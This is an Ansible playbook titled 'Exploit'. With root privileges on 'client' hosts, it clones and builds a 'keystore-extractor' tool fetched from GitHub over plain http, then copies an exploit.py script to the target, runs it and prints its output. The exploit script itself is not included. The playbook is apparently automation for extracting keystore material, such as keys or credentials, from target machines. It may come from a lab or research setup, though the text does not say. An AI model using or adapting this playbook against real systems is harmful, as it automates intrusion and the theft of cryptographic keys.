---
- name: Exploit
  hosts: client
  become: yes
  tasks:
  - name: Clone keystore-extractor from git
    git: 
      repo: http://github.com/lucasdrufva/keystore-extractor.git
      dest: "keystore-extractor"
      clone: yes

  - name: Install go
    apt: pkg=golang-go
  
  - name: Build keystore-extractor
    shell: "go build"
    args:
      chdir: "keystore-extractor"

  - name: Transfer exploit.py
    copy: 
      src: "exploit.py"
      dest: "exploit.py"
  
  - name: EXPLOIT!
    script: exploit.py 
    register: output

  - debug: var=output.stdout_lines
